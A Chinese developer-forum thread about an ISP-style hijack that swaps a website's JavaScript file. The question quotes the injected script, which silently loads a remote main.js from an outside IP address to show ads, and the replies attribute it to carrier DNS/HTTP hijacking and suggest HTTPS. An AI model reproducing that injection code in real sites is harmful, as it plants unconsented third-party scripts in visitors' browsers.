问题描述
测试发现,访问网站首页的时候,有一个js文件被替换,比如源js文件名是aa.js,被替换后的js代码如下:(function(){o="http://....../aa.js?";sh="http://61.160.200.223:7701/main.js?v=3.93&sp=304&ty=dpc";w=window;d=document;functionins(s,dm,id){e=d.createElement("script");e.src=s;e.type="text/javascript";id?e.id=id:null;dm.appendChild(e);};p=d.scripts[d.scripts.length-1].parentNode;ins(o,p);ds=function(){db=d.body;if(db&&!document.getElementById("bdstat")){if((w.innerWidth||d.documentElement.clientWidth||db.clientWidth)>1){if(w.top==w.self){ins(sh,db,"bdstat");}}}else{setTimeout("ds()",1500);}};ds();})();varmim_sp="304";varmim_aid="5475";varmim_uid="XFdeXVJAXFxZWVc=";varmim_src="...../aa.js";varmim_adtype="0";varmim_ty="dpc";网上搜索的时候发现不是我一个,其他人http://haomou.net/2016/01/14/2016_anti_junk/和我的问题相同。61.160.200.223这个ip到底是哪家公司的,太恶心了!求大神帮忙啊。
解决方案
解决方案二:
DNS挟持要打电话去电信投诉,然后他们会给你取消的默认是开通的。贱
解决方案三:
61.160.200.223来自江苏省常州市电信
解决方案四:
服务商同时干着不可告人的事情
解决方案五:
谢谢各位,我给电信打个电话先问一问。
解决方案六:
通过昨天晚上对dnshttp劫持的研究,再综合各种新闻,以及自己的114广告,电信干这事的概率比较大。现在的问题是这种劫持不光损害了消费者的利益,还对网站的正常运行产生了破坏。我现在是不知道它要劫持那个js文件,如何预防等等一系列的问题。由于劫持js文件的问题,导致我的网站不能正常运行,我花了很多的时间金钱,人累的狗似的,最后做好了还不能用,这打击太大了。人非常疲倦,很想睡觉放弃。
解决方案七:
刚才看了一下它的代码其中有这个api.load("http://cdn.tanx.com/t/tanxmobile/mraid.js",function(){这个网站自称是阿里妈妈旗下,产业链真完备啊,这钱赚得轻松啊。
解决方案八:
运营商干的,所以现在都用https了
解决方案九:
应该就是DNS劫持了,这东西很恶心的,比如打开某些正常网站,右下角可能都会莫名其妙出现一个广告。。。刷新一下又没了,我之前的网站也是这样,结果用户还跑过来问我,怎么放了个右下角广告!换成https的话可以避免被劫持。